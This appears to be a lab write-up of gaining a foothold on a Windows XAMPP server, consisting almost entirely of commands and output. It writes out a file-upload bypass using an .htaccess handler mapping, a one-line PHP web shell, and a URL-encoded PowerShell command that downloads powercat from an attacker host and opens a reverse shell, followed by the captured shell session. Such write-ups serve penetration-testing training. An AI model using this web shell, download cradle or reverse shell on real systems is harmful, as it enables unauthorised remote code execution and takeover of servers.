Foothold
$ cp /var/lib/inetsim/http/fakefiles/sample.jpg .
http://access.offsec/uploads/
$ vi shell.php
$ echo 'AddType application/x-httpd-php .pwned' > .htaccess
$ echo '<?php echo shell_exec($_GET["cmd"]); ?>' > cmd.pwned
$ curl http://192.168.157.187/uploads/cmd.pwned?cmd=whoami
access\svc_apache
$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
$ nc -lnvp 1337
listening on [any] 1337 ...
$ curl 'http://192.168.157.187/uploads/cmd.pwned?cmd=powershell.exe%20-c%20%22IEX%28New-Object%20System.Net.WebClient%29.DownloadString%28%27http%3A%2F%2F192.168.45.169%2Fpowercat.ps1%27%29%3Bpowercat%20-c%20192.168.45.169%20-p%201337%20-e%20powershell%22'
$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.157.187] 49939
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\uploads> whoami
whoami
access\svc_apache
PS C:\xampp\htdocs\uploads> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.157.187
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.157.254
PS C:\xampp\htdocs\uploads>